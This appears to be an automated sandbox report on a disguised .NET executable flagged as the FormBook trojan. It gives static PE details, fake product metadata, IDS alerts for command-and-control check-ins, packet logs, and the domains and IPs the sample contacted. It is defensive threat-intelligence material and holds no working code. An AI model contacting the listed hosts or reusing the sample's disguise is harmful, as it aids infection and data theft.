                                                                SHA512:426b9cf314fbb2e97ce6b0a32a715e96b669435743a04403f4be8006c4e0d50ea038ea3d689d43216fe8a1fdb60e780395856506869b13a8cf2f2570b39d3748
                                                                SSDEEP:12288:g7Z5LlLscvSGSaabV/HhLaeOYeEKJgUNdaxRPWId1u2KudAA:g7Z5tdqGSamV/BLa3YBQpIdQMA
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..Z...........y... ........@.. .......................@............@................................

                                                                File Icon

                                                                Icon Hash:6eecccccd6d2f2f2

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4b798e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x607393D5 [Mon Apr 12 00:27:01 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb793c0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x18cb0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000xb59940xb5a00False0.955060650379data7.95048824536IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xb80000x18cb00x18e00False0.147240106784data4.33709757552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xd20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0xb81f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xba7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xbb8400x468GLS_BINARY_LSB_FIRST
                                                                RT_ICON0xbbca80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xbfed00x10828dBase III DBT, version number 0, next free block index 40
                                                                RT_GROUP_ICON0xd06f80x4cdata
                                                                RT_VERSION0xd07440x37edata
                                                                RT_MANIFEST0xd0ac40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2012
                                                                Assembly Version8.1.1.15
                                                                InternalNameDefaultDecoder.exe
                                                                FileVersion8.1.1.14
                                                                CompanyNameLandskip Yard Care
                                                                LegalTrademarksA++
                                                                Comments
                                                                ProductNameLevelActivator
                                                                ProductVersion8.1.1.14
                                                                FileDescriptionLevelActivator
                                                                OriginalFilenameDefaultDecoder.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                04/12/21-09:14:18.225439ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.260348ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                04/12/21-09:14:18.261599ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.296841ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                                04/12/21-09:14:18.297228ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.343108ICMP449ICMP Time-To-Live Exceeded in Transit81.95.2.138192.168.2.6
                                                                04/12/21-09:14:18.365600ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.416953ICMP449ICMP Time-To-Live Exceeded in Transit151.139.80.6192.168.2.6
                                                                04/12/21-09:14:18.417375ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.467174ICMP449ICMP Time-To-Live Exceeded in Transit151.139.80.13192.168.2.6
                                                                04/12/21-09:14:18.467592ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.517415ICMP408ICMP Echo Reply205.185.216.42192.168.2.6
                                                                04/12/21-09:15:16.607167TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.607167TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.607167TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.906033TCP1201ATTACK-RESPONSES 403 Forbidden804972634.102.136.180192.168.2.6
                                                                04/12/21-09:15:46.929966ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:15:49.942047ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:15:55.942216ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:08.022386ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:10.229217TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:10.229217TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:10.229217TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:11.838430ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:17.838594ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:27.838107TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241
                                                                04/12/21-09:16:27.838107TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241
                                                                04/12/21-09:16:27.838107TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:15:16.565964937 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.606894016 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.607017040 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.607167006 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.647965908 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906033039 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906054974 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906196117 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.906352043 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.947201967 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:21.997786999 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.197026968 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.197145939 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.197308064 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.396677971 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406625032 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406703949 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406725883 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406811953 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.406852007 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:27.502224922 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.664932013 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.665126085 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.665319920 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.827898979 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830058098 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830075979 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830271006 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.830358982 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.992778063 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:43.861591101 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:15:46.872848988 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:15:52.873462915 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:05.763292074 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:08.768917084 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:10.091120005 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.228965044 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.229063034 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.229217052 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.367069006 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371033907 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371071100 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371254921 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.371299028 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.509213924 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:14.769475937 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:15.694030046 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:15.850231886 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:15.850405931 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:15.850569963 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:16.006973028 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:16.670311928 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:16.866112947 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.034461975 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.034662008 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:20.035146952 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.035238981 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:21.878675938 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.040747881 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.040910006 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.041131020 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.203203917 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350006104 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350049019 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350191116 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.471978903 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512464046 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512500048 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512609959 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.536017895 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.674876928 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674916983 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674937010 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674953938 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.675086021 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.675159931 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.798643112 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.798738956 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.837121964 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.837205887 CEST4975580192.168.2.6204.11.56.48

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:14:10.686942101 CEST5837753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:10.758783102 CEST53583778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:10.799158096 CEST5507453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:10.847758055 CEST53550748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:13.361952066 CEST5451353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:13.420124054 CEST53545138.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:18.164731979 CEST6204453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:18.224169970 CEST53620448.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:26.925472975 CEST6379153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:26.977607965 CEST53637918.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:36.685627937 CEST6426753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:36.734603882 CEST53642678.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:47.035775900 CEST4944853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:47.084574938 CEST53494488.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:51.019444942 CEST6034253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:51.082734108 CEST53603428.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:58.656676054 CEST6134653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:58.705426931 CEST53613468.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:59.522644043 CEST5177453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:59.571387053 CEST53517748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:00.449234009 CEST5602353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:00.498135090 CEST53560238.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:01.624515057 CEST5838453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:01.676018953 CEST53583848.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:02.513360023 CEST6026153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:02.564770937 CEST53602618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:05.902707100 CEST5606153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:05.961872101 CEST53560618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:13.715930939 CEST5833653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:13.725260973 CEST5378153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:13.773940086 CEST53537818.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:13.837492943 CEST53583368.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:14.360378981 CEST5406453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:14.479217052 CEST53540648.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:14.744024038 CEST5281153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:14.795532942 CEST53528118.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.061153889 CEST5529953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.121375084 CEST53552998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.549830914 CEST6374553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.584927082 CEST5005553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.606873989 CEST53637458.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.656763077 CEST53500558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.181138039 CEST6137453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.238332987 CEST53613748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.486033916 CEST5033953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.559525013 CEST53503398.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.813932896 CEST6330753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.871057034 CEST53633078.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:17.352262020 CEST4969453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:17.409634113 CEST53496948.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:18.176126957 CEST5498253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:18.306803942 CEST53549828.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:19.174038887 CEST5001053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:19.234009027 CEST53500108.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:19.694837093 CEST6371853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:19.751991987 CEST53637188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:21.474874973 CEST6211653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:21.526458025 CEST53621168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:21.921116114 CEST6381653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:21.996145964 CEST53638168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:23.220796108 CEST5501453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:23.279370070 CEST53550148.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:27.423146963 CEST6220853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:27.501125097 CEST53622088.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:31.194750071 CEST5757453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:31.243542910 CEST53575748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:35.689838886 CEST5181853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:35.746881008 CEST53518188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:37.885531902 CEST5662853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:38.267961025 CEST53566288.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:43.797285080 CEST6077853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:43.857230902 CEST53607788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:50.551167011 CEST5379953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:50.614190102 CEST53537998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:55.203622103 CEST5468353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:55.255132914 CEST53546838.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:56.955946922 CEST5932953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:57.029330969 CEST53593298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:02.751091003 CEST6402153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:02.802588940 CEST53640218.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:03.548824072 CEST5612953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:03.597560883 CEST53561298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:05.676117897 CEST5817753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:05.736423969 CEST53581778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:09.494019032 CEST5070053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:09.542697906 CEST53507008.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:09.921472073 CEST5406953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:10.090064049 CEST53540698.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:15.510679007 CEST6117853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:15.687482119 CEST53611788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:21.681616068 CEST5701753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:21.877540112 CEST53570178.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:22.308478117 CEST5632753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:22.357327938 CEST53563278.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:26.963778973 CEST5024353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:27.029196978 CEST53502438.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:27.560142994 CEST6205553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:27.634377003 CEST53620558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:29.107760906 CEST6124953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:29.156697035 CEST53612498.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 12, 2021 09:15:16.486033916 CEST192.168.2.68.8.8.80x4c84Standard query (0)www.wapgoals.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.921116114 CEST192.168.2.68.8.8.80xbe3fStandard query (0)www.criticalredux.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:27.423146963 CEST192.168.2.68.8.8.80x36c9Standard query (0)www.rileysboutique.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:37.885531902 CEST192.168.2.68.8.8.80xace4Standard query (0)www.lehoachi.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:43.797285080 CEST192.168.2.68.8.8.80xdc16Standard query (0)www.stepmed.lifeA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:05.676117897 CEST192.168.2.68.8.8.80xc251Standard query (0)www.stepmed.lifeA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:09.921472073 CEST192.168.2.68.8.8.80x23ceStandard query (0)www.agenciaorange.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.510679007 CEST192.168.2.68.8.8.80x752eStandard query (0)www.technomark.xyzA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:21.681616068 CEST192.168.2.68.8.8.80x3b69Standard query (0)www.indiafoodtraveling.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.560142994 CEST192.168.2.68.8.8.80xffd4Standard query (0)www.marktheoilguy.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 12, 2021 09:15:16.559525013 CEST8.8.8.8192.168.2.60x4c84No error (0)www.wapgoals.comwapgoals.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:15:16.559525013 CEST8.8.8.8192.168.2.60x4c84No error (0)wapgoals.com34.102.136.180A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.996145964 CEST8.8.8.8192.168.2.60xbe3fNo error (0)www.criticalredux.comhosted.fireside.fmCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.996145964 CEST8.8.8.8192.168.2.60xbe3fNo error (0)hosted.fireside.fm45.33.51.100A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:27.501125097 CEST8.8.8.8192.168.2.60x36c9No error (0)www.rileysboutique.com74.208.236.87A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:38.267961025 CEST8.8.8.8192.168.2.60xace4No error (0)www.lehoachi.comghs.google.comCNAME (Canonical name)IN (0x0001)
